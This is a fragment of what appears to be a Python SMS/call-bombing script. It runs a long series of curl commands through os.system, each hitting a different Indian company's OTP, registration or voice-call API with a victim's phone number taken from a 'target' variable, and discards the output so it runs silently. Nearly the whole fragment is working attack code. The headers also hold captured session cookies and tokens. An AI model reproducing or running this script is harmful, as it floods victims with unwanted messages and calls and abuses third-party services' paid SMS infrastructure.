curl -X GET -H "Host:api.tjori.com" -H "Connection:keep-alive" -H "Accept:application/json, text/plain, */*" -H "User-Agent:Mozilla/5.0 (Linux; Android 10; CPH1933) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Mobile Safari/537.36" -H "Origin:https://www.tjori.com" -H "Sec-Fetch-Site:same-site" -H "Sec-Fetch-Mode:cors" -H "Sec-Fetch-Dest:empty" -H "Referer:https://www.tjori.com/" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-US,en;q=0.9" "https://api.tjori.com/api/v2/otp/?number='''+target+'''&=&country_prefix=91" > /dev/null 2>&1
''')
os.system('''
curl --http2 -X GET -H "Host:bcas-prod.byjusweb.com" -H "accept:*/*" -H "user-agent:Mozilla/5.0 (Linux; Android 10; CPH1933) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Mobile Safari/537.36" -H "content-type:application/x-www-form-urlencoded" -H "origin:https://byjus.com" -H "sec-fetch-site:cross-site" -H "sec-fetch-mode:cors" -H "sec-fetch-dest:empty" -H "referer:https://byjus.com/" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-US,en;q=0.9" "https://bcas-prod.byjusweb.com/api/voice?phoneNumber='''+target+'''&page=free-trial-classes" > /dev/null 2>&1
''')
os.system('''
curl --http2 -X POST -H "Host:www.littledesire.com" -H "content-length:65" -H "accept:*/*" -H "x-requested-with:XMLHttpRequest" -H "user-agent:Mozilla/5.0 (Linux; Android 10; CPH1933) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Mobile Safari/537.36" -H "content-type:application/x-www-form-urlencoded; charset=UTF-8" -H "origin:https://www.littledesire.com" -H "sec-fetch-site:same-origin" -H "sec-fetch-mode:cors" -H "sec-fetch-dest:empty" -H "referer:https://www.littledesire.com/register/" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-US,en;q=0.9" -H "cookie:__cfduid=db74c31b26da130b3e8df98be42153e4e1601928025" -H "cookie:PHPSESSID=isn5mrmtjks6rpf4samabcrfg5" -H "cookie:cookie_litrecentproducts=1600" -H "cookie:coock_litcurrency=INR" -H "cookie:coock_litcurrency_symbol=Rs." -H "cookie:coock_litcurrency_value=1" -H "cookie:_fbp=fb.1.1601928038653.1116247862" -H "cookie:coock_litcountryid=1" -H "cookie:coock_litcountry=India" -H "cookie:coock_litcountry_flag=t1415095440b1415114765_India-Flag.png" -d "name=Cyber+mafia&mobile='''+target+'''&emailID=cybermafia%40gmail.com" "https://www.littledesire.com/register/sendotp.php" > /dev/null 2>&1
''')
os.system('''
curl --http2 -X POST -H "Host:bcas-prod.byjusweb.com" -H "content-length:46" -H "accept:*/*" -H "user-agent:Mozilla/5.0 (Linux; Android 10; CPH1933) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Mobile Safari/537.36" -H "content-type:application/x-www-form-urlencoded" -H "origin:https://byjus.com" -H "sec-fetch-site:cross-site" -H "sec-fetch-mode:cors" -H "sec-fetch-dest:empty" -H "referer:https://byjus.com/" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-US,en;q=0.9" -d "phoneNumber='''+target+'''&page=free-trial-classes" "https://bcas-prod.byjusweb.com/api/send-otp" > /dev/null 2>&1
''')
os.system('''
curl 'https://www.cardekho.com/api/v1/account/find-user?business_unit=car&country_code=in&_format=json' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: application/json, text/plain, */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://www.cardekho.com/?utm_campaign=SER-Mob-Brand-Nonm&utm_device=c&utm_term=cardekho&network=g&utm_medium=cpc&utm_source=google&agid=44536557760&ap=&aoi=&ci=321014222&cre=354929124704&fid=&lop=1007753&ma=e&mo=&pl=&ti=kwd-296788571889&gclid=EAIaIQobChMIqa7_goaP7QIVF6uWCh1wvw7HEAAYASAAEgI1__D_BwE' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Connection: keep-alive' -H 'Cookie: AMP_TOKEN=%24NOT_FOUND; _ga=GA1.2.1025576193.1605803857; _gid=GA1.2.629529825.1605803857; _gac_UA-3882094-1=1.1605803857.EAIaIQobChMIqa7_goaP7QIVF6uWCh1wvw7HEAAYASAAEgI1__D_BwE; _gac_UA-3882094-17=1.1605803868.EAIaIQobChMIqa7_goaP7QIVF6uWCh1wvw7HEAAYASAAEgI1__D_BwE; _gat_universal=1; _gat=1; pwa_source={"isDesktop":true,"isMobile":false,"domain":"https://www.cardekho.com"}; first_query_params=dXRtX2NhbXBhaWduPVNFUi1Nb2ItQnJhbmQtTm9ubSZ1dG1fZGV2aWNlPWMmdXRtX3Rlcm09Y2FyZGVraG8mbmV0d29yaz1nJnV0bV9tZWRpdW09Y3BjJnV0bV9zb3VyY2U9Z29vZ2xlJmFnaWQ9NDQ1MzY1NTc3NjAmYXA9JmFvaT0mY2k9MzIxMDE0MjIyJmNyZT0zNTQ5MjkxMjQ3MDQmZmlkPSZsb3A9MTAwNzc1MyZtYT1lJm1vPSZwbD0mdGk9a3dkLTI5Njc4ODU3MTg4OSZnY2xpZD1FQUlhSVFvYkNoTUlxYTdfZ29hUDdRSVZGNnVXQ2gxd3Z3N0hFQUFZQVNBQUVnSTFfX0RfQndF; cd_session_id=38a3b5cd-7ded-4342-9566-35fd820aff35; firstUTMParamter=www.cardekho.com#referral#null; lastUTMParamter=google#cpc#SER-Mob-Brand-Nonm; SESSION=MzhhM2I1Y2QtN2RlZC00MzQyLTk1NjYtMzVmZDgyMGFmZjM1; _gcl_aw=GCL.1605803865.EAIaIQobChMIqa7_goaP7QIVF6uWCh1wvw7HEAAYASAAEgI1__D_BwE; _gcl_au=1.1.1841961311.1605803865; _co_session_active=1; _cc_id=93d2c5f785eb77cd67b03286df6b97ad; _gat_UA-3882094-17=1; _gac_UA-3882094-36=1.1605803868.EAIaIQobChMIqa7_goaP7QIVF6uWCh1wvw7HEAAYASAAEgI1__D_BwE; _CO_anonymousId=3e16e299-8be2-0a05-848e-31e42c5db2c8; _CO_type=connecto; CityId=51; leadForm=%7B%22choices%22%3A%7B%7D%2C%22formData%22%3A%7B%22cityName%22%3A%22Ahmedabad%22%2C%22cityId%22%3A%2251%22%7D%7D; usedcarcampaignquerystring="cityId=&connectoid=&sessionid=38a3b5cd-7ded-4342-9566-35fd820aff35&lang_code=en®ionId=0&agid=44536557760&aoi=&ap=&ci=321014222&cre=354929124704&fid=&gclid=EAIaIQobChMIqa7_goaP7QIVF6uWCh1wvw7HEAAYASAAEgI1__D_BwE&lop=1007753&ma=e&mo=&network=g&pl=&ti=kwd-296788571889&utm_campaign=SER-Mob-Brand-Nonm&utm_device=c&utm_medium=cpc&utm_source=google&utm_term=cardekho"; identifyCookie=eyJjYXJkZWtobyI6eyJfQ09faWQiOiIzZTE2ZTI5OS04YmUyLTBhMDUtODQ4ZS0zMWU0MmM1ZGIyYzgiLCJjYXJkZWtob0dDbGllbnRJZCI6IjEwMjU1NzYxOTMuMTYwNTgwMzg1NyIsImxvdGFtZV9waWQiOiI5M2QyYzVmNzg1ZWI3N2NkNjdiMDMyODZkZjZiOTdhZCJ9fQ==; CONNECTOID=3e16e299-8be2-0a05-848e-31e42c5db2c8; _fbp=fb.1.1605803875156.532383440' --data-raw 'cityId=51&connectoid=3e16e299-8be2-0a05-848e-31e42c5db2c8&sessionid=38a3b5cd-7ded-4342-9566-35fd820aff35&lang_code=en®ionId=0&subscribe=0&isPaidUser=false&mobileNo='''+target+'''&source=web' > /dev/null 2>&1
''')
os.system('''
curl 'https://zeus.housing.com/api/gql?compressed=true&isBot=false&source=web' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://housing.com/' -H 'phoenix-api-name: LOGIN_SEND_OTP_API' -H 'app-name: desktop_web_buyer' -H 'content-type: application/json; charset=UTF-8' -H 'Origin: https://housing.com' -H 'Connection: keep-alive' -H 'Cookie: userCity=94194ed7fe3a7423e9e5; cityUrl=ahmedabad; service=buy; category=residential; ssrExperiments=deals_pay_rent%3Dtrue%3Bapt_to_flat1%3Dtrue%3Bprominent_filter%3Dfalse%3Bgetcb_cta%3Dtrue%3Btest_ssr_experiment%3Dfalse%3Btest_ssr_experiment_2%3Dfalse%3Bshow_edge_hook_pdp%3Dfalse; experiments=hj%3Dtrue%3Bsentry%3Dfalse%3Bpyr%3Dtrue%3Bnearby_and_similar_listings_carousel%3DDEFAULT_NEARBY_NO_CLUSTERING%3Bfloor_plan%3Dtrue%3Bshow_rent_pay%3Dfalse%3Bone_tap_google%3Dtrue%3Btest%3Dtrue%3Bremove_70_30_experiment%3Dtrue%3Bdirect_connect%3Dfalse%3Bfilter_bar_revamp%3Dtrue%3Bnps_new%3Dtrue%3Brent_pg_toggle%3Dfalse%3Bdetails_flow%3Dfalse%3Bsticky_header%3Dtrue%3Bshow_req_callback%3Dtrue%3Bshow_rent_banner%3Dfalse; _ga=GA1.2.899300635.1605804364; _gid=GA1.2.1953344279.1605804364; _psid=1; traffic=sourcemedium%3Ddirect%20%2F%20none%3B; is_return_user=false; is_return_session=false; _gat=1; tvc_sm_fc_new=direct%7Cnone; tvc_sm_lc=direct%7Cnone; moe_uuid=7f15bf4a-9ed6-4d50-9e83-43e33a14f9ac; cto_bundle=Otv8OF9RdE1hZlB0b0NTN1FzaGIyJTJCMkhzek8ydEhiaVVDQThhTmxMdjh5aWlhWkhRM1ZkWnpkYWRCRXNublZQSTlraUxEOEhrSVBaaEpyYUtqbk1iQW1jViUyRndyU2d4MllTeXBjekJERDhaJTJCS09hVFRtdlpkUVhxR2NoMGo0NjdLcENPbEVHJTJCNUtpNW5ldDRDQ2cwMk41U1FEWm1McTJJQ2tFRWhLNGpzM1BIQnNpcyUzRA; G_ENABLED_IDPS=google; _hjid=9672142a-25b3-4ac5-b75e-7f92189498c3; _hjFirstSeen=1; _hjAbsoluteSessionInProgress=1; _uuid=8ae4d16be6dd207cc8bdf52b34a035a6' -H 'TE: Trailers' --data-raw '{"query":"____jsIh_jpM__jmG_jtx__jmG_jxZ__jkXifjvuhjtx___jtxjpM___jpMjxZ___jxZifjwsjsygg","variables":{"phone":"'''+target+'''"}}' > /dev/null 2>&1
''')
os.system('''
curl 'https://www.myntra.com/gateway/v1/auth/getotp' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://www.myntra.com/login?referer=https://www.myntra.com/?utm_source=Google&utm_medium=cpc&utm_campaign=Search%20-%20Myntra%20Brand%20(India)&gclid=EAIaIQobChMIq-jN6YiP7QIVKMIWBR0jJAQdEAAYASAAEgKDQvD_BwE' -H 'X-Sec-Clge-Req-Type: ajax' -H 'X-myntraweb: Yes' -H 'x-myntra-network: yes' -H 'X-Requested-With: browser' -H 'x-location-context: pincode=380001;source=IP' -H 'x-meta-app: deviceId=46b5b813-2027-45fd-beb4-32a59e05c339;appFamily=Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0;reqChannel=web;channel=web;' -H 'Content-Type: application/json' -H 'deviceId: 46b5b813-2027-45fd-beb4-32a59e05c339' -H 'Connection: keep-alive' -H 'Cookie: _mxab_=config.bucket%3Dregular%3Bweb.xceleratorTags%3Denabled; _pv=default; dp=d; at=ZXlKaGJHY2lPaUpJVXpJMU5pSXNJbXRwWkNJNklqRWlMQ0owZVhBaU9pSktWMVFpZlEuZXlKdWFXUjRJam9pWVRJME9UZ3laamt0TW1FNE55MHhNV1ZpTFRnME5HVXRNREF3WkROaFpqSTRaVE5tSWl3aVkybGtlQ0k2SW0xNWJuUnlZUzB3TW1RM1pHVmpOUzA0WVRBd0xUUmpOelF0T1dObU55MDVaRFl5WkdKbFlUVmxOakVpTENKaGNIQk9ZVzFsSWpvaWJYbHVkSEpoSWl3aWMzUnZjbVZKWkNJNklqSXlPVGNpTENKbGVIQWlPakUyTWpFek5UWTNOVGtzSW1semN5STZJa2xFUlVFaWZRLnZxTWxxYXVPWkNQaXVTQUtFLVg0ZW5XV2FaQzlzZEp0QTNsbjRJNTFPTDA=; bc=true; xid=a24982f9-2a87-11eb-844e-000d3af28e3f; utm_track_v1=%7B%22utm_source%22%3A%22%22%2C%22utm_medium%22%3A%22cpc%22%2C%22utm_campaign%22%3A%22Search%20-%20Myntra%20Brand%20(India)%22%2C%22campaign_id%22%3A%22%22%2C%22octane_email%22%3A%22%22%2C%22trackstart%22%3A1605804814%2C%22trackend%22%3A1605804874%7D; lt_timeout=1; lt_session=1; utrid=uuid-16058047596718; AKA_A2=A; ak_bmsc=3B01352D11AC0DFBF8DC544FEEB6A54B312C8ACDF4610000D7A2B65F6EC1A61C~pltptOuzGbCRuGEF6xTFznwwu1f6UXKTDXXtT9KoJua+NP0WxZedn5bRaD2KNlYczYOf0PWlE4ep9kpBhLm+Mre5L7S0qpo8On/iIESULsoKvoITZVPuK/i+8H84J/UAhJXJhYzcWSaYkRz/KJrFWBJkwzfvlF2pjciO1bgFiBO4OrmHgvGGPDheHHDpr3w6HJOytXTBLC6zXtmmUsl9qVZigmn7b9I9jOJAd7uYC2eWtrvdpVsGRkM1DHOVHQqFCN; akaas_myntra_SegmentationLabel=1608396814~rv=59~id=dc0e14339a7e60f27d59401941912506~rn=PWA; bm_sz=7B08ACDA24B9EE915C3F1C2347E2778E~YAAQzYosMVYlIIh1AQAApBps4QmRf+OBjdtnOHLMKTDIe6EFrLZfo2BIavicm5Xpx/CB6nHpJM2ayFwJjILxs5lPT58okC5jLJndx6+5rgDh7kxgQoQLu2wjt0YAJTop503HMl1dgPaAzQHT+X8Rq5YalTclnDXSmq8y5eSrRHGMQnymNs8W0aFpIMk5Dtr9; _abck=9EAE6DD4148165662059F755B3D0147F~0~YAAQzYosMagnIIh1AQAACZ1s4QTdjzQ/tYQ0xSQsz1AmJMyXU2R1udwaE2QoQwLh69rzWrMSGwP/ykgne4M6/lCB6LzEinsLgY/7PkBf8N+DLQaTHwBM68u0TwGQfLDIM9AVR6JjpqXK6YgdxaFYM8mzxVVT8OhhwwTpcxIqwVrP7FfYserPUe/KN22clYRrWV+6qnXnljR8gc70vq6SCx5shukFI8NnwHTyU79lCfQO3iEQAK6NndyKbOCciIN1CPwfT4hYFfPK0a7AwLES6IL0HeFUIX18v/j7r2HG9u+EjBwQ+HvgI18/U1w9xyNr1VbY2UOZY3+BwIawAkohUHaKOhLFRg==~-1~-1~-1; _d_id=46b5b813-2027-45fd-beb4-32a59e05c339; _ma_session=%7B%22id%22%3A%221c0d4e1d-3750-42ed-b1d2-9eea1e0f432c-46b5b813-2027-45fd-beb4-32a59e05c339%22%2C%22referrer_url%22%3A%22https%3A%2F%2Fwww.google.com%2F%22%2C%22utm_medium%22%3A%22cpc%22%2C%22utm_source%22%3A%22Google%22%2C%22utm_channel%22%3A%22cpc%22%2C%22utm_campaign%22%3A%22Search%20-%20Myntra%20Brand%20(India)%22%7D; _ma_events_sequence=14; microsessid=708; _xsrf=IXkzSibsIm9aRShCDg631HEw99gc6TMK; user_session=YH42CFeKV7r2qBUsTT-sSg.CYkYZ_oZG89jckCZiUmJAvZ3v0s9BxVNKQlyuJgOxe5vG79IJIeZ4YKPHoKORY5vtxbaHsV4LIyjgeXe8RI1u3ZRn7rsBWLBws-yQ_Izoy-dRHY_y-ggnj_WIWNzo231htZJfn0VOH-3RBMXjPCavw.1605804763097.86400000.lHhIKnNdQSsIPdaehWgDv5Oh0YmUKmCKulQs_pc_Atw; bm_sv=EBF7FA7F28AB93306597CDBD2127B038~5WknPn22D1cle7mu5A6zyY5gbElYfJ+EtXQnfNSHEtoOUlw3jTFHoPh4IzFuqGrF7Xvb8PL55dkEUOVUcCJFOMRgXEd/y3DuxYAipXGZYuSlOCXsAzsEchWm90BgWO1Mnuo+nApmKQRu7++SDK8J2TTlYX9uUCDp5yEm0xI+0Ck=; mynt-eupv=1; AMP_TOKEN=%24NOT_FOUND; mynt-ulc-api=pincode%3A380001; mynt-loc-src=expiry%3A1605806065619%7Csource%3AIP; _ga=GA1.2.991137991.1605804626; _gid=GA1.2.263544867.1605804626; _gac_UA-1752831-18=1.1605804675.EAIaIQobChMIq-jN6YiP7QIVKMIWBR0jJAQdEAAYASAAEgKDQvD_BwE; ak_RT="z=1&dm=myntra.com&si=b6edc5d2-549a-4571-b073-909b00326f53&ss=khp2lyh7&sl=2&tt=4ej&obo=1&rl=1"; _gcl_aw=GCL.1605804690.EAIaIQobChMIq-jN6YiP7QIVKMIWBR0jJAQdEAAYASAAEgKDQvD_BwE; _gcl_au=1.1.1794472781.1605804627; tvc_VID=1; _fbp=fb.1.1605804627724.884732793; G_ENABLED_IDPS=google; __insp_wid=617845923; __insp_slim=1605804680422; __insp_nv=true; __insp_targlpu=aHR0cHM6Ly93d3cubXludHJhLmNvbS9sb2dpbj9yZWZlcmVyPWh0dHBzOi8vd3d3Lm15bnRyYS5jb20vP3V0bV9zb3VyY2U9R29vZ2xlJnV0bV9tZWRpdW09Y3BjJnV0bV9jYW1wYWlnbj1TZWFyY2glMjAtJTIwTXludHJhJTIwQnJhbmQlMjAoSW5kaWEpJmdjbGlkPUVBSWFJUW9iQ2hNSXEtak42WWlQN1FJVktNSVdCUjBqSkFRZEVBQVlBU0FBRWdLRFF2RF9Cd0U%3D; __insp_targlpt=TXludHJh; __insp_norec_sess=true; _gat=1' --data-raw '{"phoneNumber":"'''+target+'''"}' > /dev/null 2>&1
''')
os.system('''
curl 'https://www.purplle.com/api/account/authorization/send_otp?phone='''+target+'''&action=register' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: application/json, text/plain, */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://www.purplle.com/login' -H 'newrelic: eyJ2IjpbMCwxXSwiZCI6eyJ0eSI6IkJyb3dzZXIiLCJhYyI6IjIxNzQ4NDMiLCJhcCI6IjEwMTg3NTgwNjUiLCJpZCI6IjhkNWQ3NjVkNjNmYWQwNzUiLCJ0ciI6ImYxOWE0OWYwZTExNGVlMDJmZDBkMjJkYjE0NjQ0M2EwIiwidGkiOjE2MDU4MDYxMDc3OTF9fQ==' -H 'traceparent: 00-f19a49f0e114ee02fd0d22db146443a0-8d5d765d63fad075-01' -H 'tracestate: 2174843@nr=0-1-2174843-1018758065-8d5d765d63fad075----1605806107791' -H 'Content-Type: application/x-www-form-urlencoded' -H 'token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJkZXZpY2VfaWQiOiJVV1Y2TndSbmhKMndRM1R5U2EiLCJtb2RlX2RldmljZSI6ImRlc2t0b3AiLCJtb2RlX2RldmljZV90eXBlIjoid2ViIiwiaWF0IjoxNjA1ODA2MTMyLCJleHAiOjE2MTM1ODIxMzIsImF1ZCI6IndlYiIsImlzcyI6InRva2VubWljcm9zZXJ2aWNlIn0.7KOOZqrvyunuXk5HWHEyBYILwHlBE5qPfuMsnPf2Ir4' -H 'device_id: UWV6NwRnhJ2wQ3TySa' -H 'Connection: keep-alive' -H 'Cookie: __cfduid=d4398fd17981d86c2371424cf96fc01241605806132; mode_device=desktop; visitorppl=UWV6NwRnhJ2wQ3TySa; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJkZXZpY2VfaWQiOiJVV1Y2TndSbmhKMndRM1R5U2EiLCJtb2RlX2RldmljZSI6ImRlc2t0b3AiLCJtb2RlX2RldmljZV90eXBlIjoid2ViIiwiaWF0IjoxNjA1ODA2MTMyLCJleHAiOjE2MTM1ODIxMzIsImF1ZCI6IndlYiIsImlzcyI6InRva2VubWljcm9zZXJ2aWNlIn0.7KOOZqrvyunuXk5HWHEyBYILwHlBE5qPfuMsnPf2Ir4; sessionCreatedTime=1605805996; sessionExpiryTime=1605807900; _tmpsess=UWV6NwRnhJ2wQ3TySa_1605806133; session_initiated=Direct; client_ip=103.249.233.70; environment=prod; __cf_bm=2cf03eca74ff5b00160a5b2489d19fa3bb5c9cf2-1605806133-1800-Ae1ffGohF5vDKq/Cn/Y2oPsOjyG6Z8Ww7FIkIfZsHlMH0V0+Wvgcw781SThdpijW5Uym1Jk7dgtCfgxpa4NDakQ=; __cfruid=f000636a2afed6e7d6688d31092a30c34b07e91a-1605806133; g_state={}; beautyProfilePopup=1; session_id=9f7c5991c4d882843c2b90dd7f0247e3; isSessionDetails=true; _gcl_au=1.1.1994578886.1605806010; _ga=GA1.2.997997447.1605806011; _gid=GA1.2.294360080.1605806011; _fbp=fb.1.1605806017856.964469739; cto_bundle=uM7QM19xJTJGOW1DcjhVdW5aN1BqUW4zQUhYZnB1UTFWeTJtQ2hRZEN6V1M3TnB4UzJTUkVHbmlFSTh4YnlIck1MUGZzWjNhNSUyRlJDcmhrRmhTSSUyQnhvWnpnSjVTVzc2NzVxcDRtbzEzOVFOSGFkeTRlOTd2OXJLZWl3JTJGZ3NxcTZJSVhQJTJCQjl6TVVWTSUyQiUyRjkzMFlYYW55OEZlU1ducGJsa3dKRGhvNjJwdHRyQjVGbk5pTSUzRA; _gat_UA-28132362-1=1' -H 'TE: Trailers' > /dev/null 2>&1
''')
os.system('''
curl 'https://www.goibibo.com/auth/v2.0/ask_otp/?intent=signup&phone='''+target+'''&gi_source=gi_iden' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://www.goibibo.com/accounts/login/' -H 'Connection: keep-alive' -H 'Cookie: sessionid=ed2dy8fw5kxe6m9zyawdfk6pn7d8z1y2; ak_bmsc=E59BAC9EDB10F9AE1092F2982D8449A4312C8CC6B022000027ABB65F21FB0601~plwLYWua8+d2U3XkYAs2LRwxrzEhFH1qyc3n0rRNYOeDhrInqD0cMfJiTl/m1xnYUpoS5F1uwU+kB/1HKNV202yHCf6naKaOteJXFjN5zrciLackQYxYSi4KXP3J2u47cUR6RkdMy5rZo6x4Xsx0a5ahF0J861OXzBy+++43u3FhLhqGgeOKm3AIIELm8e4Jj7CeeQ/+pq7hVivw26uGUEGvf0ZDDkI7KqjLlLxt6wT6jcZOR/Gm+CHNb4ARttIUdW; bm_sz=50C92C5E476FA452B6CB32C436CF9609~YAAQxowsMXhpLqJ1AQAAfpCM4Qkksxh4hyhct+cSt5aS3TY+1dsYAwVFgyYvdG9WCHjGZRoIc2prLzqa+FcZRDBo25HqYoz6bAdUsvQXEhxj3bep1Sfz4vtfpVu26ljdTN58MyR3BZvznCcwOXneCbciIpV2Pf1lNkkX0h9OtXjedyIkIxKC9hjI1uwNO5Z0ZA==; _abck=A296CB1B466514566FF12C0D4322F0E6~-1~YAAQxowsMalpLqJ1AQAAKfuM4QTDCdvc0rWRJYhDIpf+s/FzuFXLVO70XrMDTPLP58udmZdehokQSeBPLQf9P28s6DokR6nvR6J7APGZ/FelmwaXGct1h/jBekCxfpxKG9nuLTnAUQ3etrsv9TVTq0XD0r34EsLnwN3kt058XN8LaZwpgfdX95eidrgtQbaLr1M72QKThhzV0wr9deeSZ25d3j8fOt8Ykv1FitBxEPkSpGn9xN01obSVAcmnF+CPEEwRNVDQGglohwRAdct5KQMBcVT77U5JCB3oNsTTZuvhogo7WBDenHLQ7/7iGmEQ/j8EVqCukYjDxHQtJOqfOud6fvo4tdw=~0~-1~-1; bm_sv=0D9388B541F6127BA354C60604D39224~RbEnoZYD+MauCH6Km0XgHtWBIzk+YDo/a3A/DuogWhLGnmLhduMWW8iHFMbZ2N5AhghnC9LyMClhfy2eBQnGzAbWHd6xL6kLRlgQ7fkKNs4RMz2e2wEFzXszPGZT++7NoGsx05GY6zOgospnsti2+fuDHUkgfdiirSnRQMRmWvk=' -H 'Upgrade-Insecure-Requests: 1' -H 'TE: Trailers' > /dev/null 2>&1
''')
os.system('''
curl 'https://unacademy.com/api/v3/user/user_check/' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://unacademy.com/login' -H 'authorization: Bearer undefined' -H 'Content-Type: application/json' -H 'X-Platform: 0' -H 'Origin: https://unacademy.com' -H 'Connection: keep-alive' -H 'Cookie: lux_uid=160580827996552921; mp_535208d541f9b5935ef91a365b0439e1_mixpanel=%7B%22distinct_id%22%3A%20%22175e1a1d9d23-0f90f9db57a3998-31634645-e0716-175e1a1d9d487%22%2C%22%24device_id%22%3A%20%22175e1a1d9d23-0f90f9db57a3998-31634645-e0716-175e1a1d9d487%22%2C%22Platform%22%3A%20%22Desktop%22%2C%22%24search_engine%22%3A%20%22google%22%2C%22%24initial_referrer%22%3A%20%22https%3A%2F%2Fwww.google.com%2F%22%2C%22%24initial_referring_domain%22%3A%20%22www.google.com%22%7D; anonymous_session_id=a3a30e3d-e357-4075-a408-8a83edacdde4; _ga=GA1.2.1265900968.1605808284; _gid=GA1.2.1040017715.1605808284; _anonymous_id=Q-94616; _gcl_au=1.1.1096510721.1605808293; _fbp=fb.1.1605808295710.1397696204; afUserId=1279ff42-4f26-4e23-8da8-116480de04b8-p' -H 'TE: Trailers' --data-raw '{"phone":"'''+target+'''","country_code":"IN","otp_type":1,"email":"","send_otp":true,"is_un_teach_user":false}' > /dev/null 2>&1
''')
os.system('''
curl 'https://www.netmeds.com/mst/rest/v1/id/details/'''+target+'''' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: application/json, text/plain, */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://www.netmeds.com/customer/account/login' -H 'Connection: keep-alive' -H 'Cookie: _ALGOLIA=anonymous-ef5a7b35-f6b3-473a-8da2-87b382d4b9f4; _gcl_au=1.1.1413759472.1605808879; nms_mgo_pincode=110001; _ga=GA1.2.2088543025.1605808880; _gid=GA1.2.1818116564.1605808880; _fbp=fb.1.1605808881486.839169445; _gat_UA-63910444-1=1; cto_bundle=tuIO2F9xJTJGOW1DcjhVdW5aN1BqUW4zQUhYZmxmR1drYVBqdGlKQjc1NXB1TGRyQTQ4Z2pXNGdtc3NZNjhsZUVaZ0JLdFBVUFJqMkF1b0t2WHJ2SlZMYjZYR0UyMXE3REZVblpGalB0VXVXQ1RMRU1RSkJuTzVoa1hnYldKUnY3N3BQRiUyQkowa2VyV2xlRXFsdmclMkJFY0VMUGxBOHhlSEluMUJwU0ZsR3JtQkkxd2NqQjQlM0Q; bsUl=0; _gat=1; G_ENABLED_IDPS=google; _uetsid=3a6a6ed02a9111ebb4b94dd739e83e07; _uetvid=3a6b21e02a9111eba95a6fbf22726b3e; bsCoId=3605809031100' > /dev/null 2>&1
''')
os.system('''
curl 'https://www.aakash.ac.in/anthe/global-otp-verify' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: https://www.aakash.ac.in/anthe?gclsrc=aw.ds&&utm_source=Google_Search&utm_medium=akash&utm_content=Aakash&utm_campaign=AKINT_ANTHE_2020_Search_Brand_Core_Exact&gclid=EAIaIQobChMI36vu9pqP7QIVGsEWBR0XYweVEAAYASAAEgIb0PD_BwE' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Connection: keep-alive' -H 'Cookie: AWSALB=33WuA+1Wo/9o9qsN5+ItaMflaNVSH9axLemPCpKg3DVqMGr2739I1CdoIOq36iGTxIUA/lup/aoYF9I62iVmUvBNDBxR1RJYSyRzY5PvueN2udkznI45dfQ8P6cp; AWSALBCORS=33WuA+1Wo/9o9qsN5+ItaMflaNVSH9axLemPCpKg3DVqMGr2739I1CdoIOq36iGTxIUA/lup/aoYF9I62iVmUvBNDBxR1RJYSyRzY5PvueN2udkznI45dfQ8P6cp; SESSa0e8f32479e6dd02f90001de8e7dd4a7=vWAFVC4ideLy7Zj5Y7QW0xToqekCRQv5EvIrZ0V82So; _gcl_aw=GCL.1605809480.EAIaIQobChMI36vu9pqP7QIVGsEWBR0XYweVEAAYASAAEgIb0PD_BwE; _gcl_dc=GCL.1605809480.EAIaIQobChMI36vu9pqP7QIVGsEWBR0XYweVEAAYASAAEgIb0PD_BwE; _gcl_au=1.1.143739277.1605809480; _ga=GA1.3.1508480274.1605809483; _gid=GA1.3.426604834.1605809483; _gac_UA-30079688-1=1.1605809520.EAIaIQobChMI36vu9pqP7QIVGsEWBR0XYweVEAAYASAAEgIb0PD_BwE; _uetsid=a2183b802a9211ebb3b13982254008e2; _uetvid=a2192a502a9211ebbb9a8f22d3b913a0; _gat_UA-30079688-1=1; _fbp=fb.2.1605809486165.1093833284; outbrain_cid_fetch=true' -H 'TE: Trailers' --data-raw '&mobileparam='''+target+'''&global_data_id=anthe-otp&student_name=&corpid=undefined' > /dev/null 2>&1
''')
os.system('''
